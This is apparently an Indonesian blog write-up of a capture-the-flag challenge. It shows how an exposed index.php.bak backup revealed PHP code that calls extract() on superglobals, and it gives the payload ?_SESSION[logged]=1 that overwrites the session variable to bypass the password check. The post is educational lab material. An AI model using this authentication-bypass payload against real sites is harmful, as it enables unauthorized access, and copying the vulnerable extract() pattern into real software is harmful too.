saya coba dengan index.php.bak dan ternyata itu berhasil langsung mendownload backupnya, lalu saya buka file backup terdapat kode php, dikode tersebut terdapat function vuln yang bisa digunakan untuk membypass password.
function extract() digunakan menggunakan sebuah parameter global seperti $_POST / $_GET menjadi variable, contoh $_GET["dekguh"] = "pingin jadi onnanimos" akan otomatis menjadi $dekguh = "pingin jadi onnanimos" :P.foreach ($superglobals as $superglobal) {extract($superglobal, 0 );}
fokus pada bagian code:
if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION["logged"]==1 ) ){dari kode diatas jadi saya hanya perlu membuat 1 parameter:
/ch17/?_SESSION[logged]=1setelah itu enter maka flag akan muncul.
referensi:
https://davidnoren.com/post/php-extract-vulnerability.html
No comments:
Post a Comment